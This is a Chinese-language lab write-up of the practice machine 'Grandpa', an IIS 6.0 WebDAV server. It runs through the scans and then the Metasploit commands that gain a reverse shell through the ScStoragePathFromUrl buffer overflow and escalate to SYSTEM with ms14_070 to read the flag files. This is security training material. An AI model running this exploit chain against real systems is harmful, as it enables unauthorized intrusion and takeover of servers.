Grandpa(msf栈溢出)

10.10.10.14

scan

80/tcp open http Microsoft IIS httpd 6.0

只开了一个80端口,iis 6.0让我想到了文件解析漏洞

os scan:Running (JUST GUESSING): Microsoft Windows 2003|2008|2000|XP (91%)

web

anyway,先扫一下web目录吧~~
只有一个img目录,403

信息很少啊,估计是中间件漏洞,于是搜一下IIS 6.0 exploit,以及“microsoftofficewebserver header: 5.0_Pub”

nikto scan result:

1
2
3
4
5
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV

注意dav

trying1: 远程栈溢出

1
2
3
4
searchsploit iis 6.0
searchsploit -m exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow  
利用失败

trying2: Microsoft FrontPage匿名登陆

OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.

搜索一下Microsoft FrontPage

auxiliary/scanner/http/frontpage_login

结果

1
2
3
[*] 10.10.10.14:80        - http://10.10.10.14/ may not support FrontPage Server Extensions
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

什么是WebDAV?

WebDAV 是 HTTP/1.1 协议的扩展,它允许客户机执行远程 Web 内容制作操作。WebDAV 是对 HTTP/1.1 协议的扩展,添加了新的 HTTP 方法和标头,支持任意类型的 Web 制作,不仅支持 HTML 和 XML,还支持文本、图形、电子表格等格式。
Webdav安全配置相关与漏洞利用

trying3: webdav put上传

1
2
3
4
5
6
7
exploit/windows/iis/iis_webdav_upload_asp

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] Checking /metasploit250598085.asp
[*] Uploading 611136 bytes to /metasploit250598085.txt...
[-] Upload failed on /metasploit250598085.txt [500 Internal Server Error]
[*] Exploit completed, but no session was created.

获得一个shell

远程栈溢出

当时python的exp执行失败,就以为该漏洞不存在==

1
2
3
4
5
6
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOST 10.10.10.14
run
getuid
pwd
sysinfo

提权

1
2
3
4
5
6
7
8
9
10
11
search suggester

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 28 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

尝试后,成功提权

1
2
3
4
5
6
7
8
9
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 3
set LHOST tun0
run
ps 查看进程
cd C:\Documents and Settings\Harry\Desktop
cat user.txt
cd C:\Documents and Settings\Administrator\Desktop
cat root.txt

总结

学习了msf的windows提权:search suggester

control z + y,将meterpreter到后台进程。

sessions -i 3,转到meterpreter

在执行缓冲区溢出时,执行一遍失败是很正常的,多试几遍~~